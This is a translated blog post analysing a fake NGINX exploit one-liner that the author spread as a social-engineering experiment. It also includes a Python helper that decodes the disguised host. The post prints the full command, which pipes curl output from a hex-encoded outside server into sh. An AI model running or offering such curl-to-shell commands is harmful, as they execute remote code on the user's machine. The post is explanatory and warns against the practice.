Translator's note:
TL;DR: Do not pipe anything into sh or bash, under any circumstances. It is a great way to lose control of your computer.
I want to share with you a short story about a funny PoC exploit that was created on May 31st. It appeared promptly in response to news from
Having just finished working on a new curl exploitation trick, I took the first tweet and "published a working PoC" consisting of a single line of code that supposedly exploits the discovered vulnerability. Yes, it was a complete fake. I figured I would be exposed right away, and that at best I would get a few retweets (oh well).
However, I could not have imagined what happened next. My Twitter popularity grew. Surprisingly, at the time of writing (15:00 Moscow time, June 1) very few people have noticed that it is a fake. Most people retweet it without examining it at all (or simply admiring the pretty ASCII art it prints).
Just look at how pretty it is!
While all of this is just flourishes and pretty characters, it is obvious that people had to run the code on their machine to see it. Fortunately, browsers work the same way, and combined with the fact that I really did not want to get into legal trouble, the code hidden on my site only made echo calls, without trying to install or run any additional code.
A small digression:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Socio-electronic engineering (SEE) beyond phishing
Safety and familiarity were the main part of this experiment. I think they are what made it a success. The command line clearly signalled safety by mentioning "127.0.0.1" (the well-known localhost). Localhost is perceived as safe, and the data supposedly never leaves your computer.
Familiarity was the second key part of the experiment. Since the target audience consisted mostly of people familiar with the basics of computer security, it was important to design the code so that its parts looked known and recognizable (and therefore safe). Borrowing old exploitation concepts and combining them in an unusual way proved very successful.
Below is a detailed analysis of the one-liner. Everything in this construction is purely cosmetic, and none of it is needed for it to actually work.
Which components are actually needed? These are -gsS, -O 0x0238f06a, |sh and the web server itself. The web server contained no malicious commands: it only drew ASCII pictures using echo commands in a script located in index.html. When a user entered the line with |sh in the middle, index.html was loaded and executed. Fortunately, the maintainers of the web server had no malicious intentions.
- ../../../%00 - represents directory traversal;
- ngx_stream_module.so - the path to a non-existent NGINX module;
- /bin/sh%00<'protocol:TCP' - we supposedly have to launch /bin/sh on the target machine and direct its output to a TCP socket;
- -O 0x0238f06a#PLToffset - a mysterious thing, augmented with #PLToffset, which looks like a memory offset somehow located in the PLT;
- |sh; - another key part. We had to direct the output to sh/bash in order to execute the code coming from the attacking web server located at 0x0238f06a (2.56.240.x);
- nc /dev/tcp/localhost - a dummy in which netcat refers to /dev/tcp/localhost so that everything looks safe again. In fact, it does nothing and is included in the line for beauty.
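As an added example (not code from the post), here is a small Python 3.8+ script that lists the hosts a pasted curl line would actually contact and decodes inet_aton-style address spellings such as 0x0238f06a, so the 127.0.0.1 decoy can be told apart from the real server; the tokenizer is my own and assumes, as in this line, curl options that take no argument.

```python
import re
import shlex
from ipaddress import IPv4Address
# The one-liner from the post, used as sample input for the functions below.
FAKE_POC = ("curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler"
            "?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00"
            "<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost")
# inet_aton(3) accepts each dot-separated part as 0x hex, leading-0 octal, or decimal.
_PARTS = ((re.compile(r"0[xX][0-9a-fA-F]+$"), 16),
          (re.compile(r"0[0-7]*$"), 8),
          (re.compile(r"[1-9][0-9]*$"), 10))
def _part(p):
    """One part as an int, or None if inet_aton would reject it."""
    return next((int(p, base) for rx, base in _PARTS if rx.match(p)), None)
def decode_inet_aton(host):
    """Dotted-quad form of an inet_aton-style host (hex, octal, decimal, 1 to 4 parts),
    or None when the string is a hostname rather than a disguised address."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_part(p) for p in parts]
    if None in values:
        return None
    *head, last = values                      # the last part fills the remaining bytes
    if any(v > 255 for v in head) or last >= 256 ** (4 - len(head)):
        return None
    addr = last
    for i, v in enumerate(head):
        addr |= v << (8 * (3 - i))
    return str(IPv4Address(addr))
def curl_hosts(cmdline):
    """(host, decoded) for each URL argument of the leading curl command in cmdline.
    Assumes the shape of FAKE_POC: curl options that take no argument of their own."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split, lex.commenters = True, ""   # keep '#...': it is a URL fragment
    hosts, skip_next = [], False
    for tok in list(lex)[1:]:                          # token 0 is "curl" itself
        if skip_next:
            skip_next = False                          # operand of a shell redirection
        elif tok[:1] in ("|", ";", "&", "(", ")"):
            break                                      # end of the curl command
        elif tok[:1] in ("<", ">"):
            skip_next = True
        elif not tok.startswith("-"):                  # everything else is a URL
            rest = re.sub(r"^[A-Za-z][A-Za-z0-9+.-]*://", "", tok)
            host = re.split(r"[/?#]", rest, maxsplit=1)[0].rsplit("@", 1)[-1]
            host = re.sub(r":\d+$", "", host)          # drop the port
            hosts.append((host, decode_inet_aton(host)))
    return hosts
```

Run on the one-liner, curl_hosts reports the decoy hostname as a plain name and 0x0238f06a as 2.56.240.106, the only address the command would really fetch a script from.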
This concludes the analysis of the one-line script and the discussion of the elements of "socio-electronic engineering" (a more sophisticated form of phishing).
Web Server Configuration and Countermeasures
Since most of my followers are infosec people / hackers, I decided to make the web server somewhat resistant to displays of "interest" on their part, so that the guys would have something to do (and it could be fun preparation). I am not going to describe all the obstacles here, since the experiment is still ongoing, but here are a few things the server does:
- It closely monitors sharing attempts on other social networks and substitutes different preview thumbnails to encourage the user to click the link.
- Redirects Chrome/Mozilla/Safari/etc to the Thugcrowd promotional video instead of showing the shell script.
- Watches for OBVIOUS signs of intrusion/hacking, then starts forwarding the requests to NSA servers (ha!).
- Installs a Trojan, along with a BIOS rootkit, on the computers of all users who visit the site from a regular browser (just kidding!).
A small section for haters
In this experiment, my only goal was to learn a bit more about Apache - in particular, its cool request redirection rules - and I thought: why not?
NGINX Exploit (a real one!)
Source: www.habr.com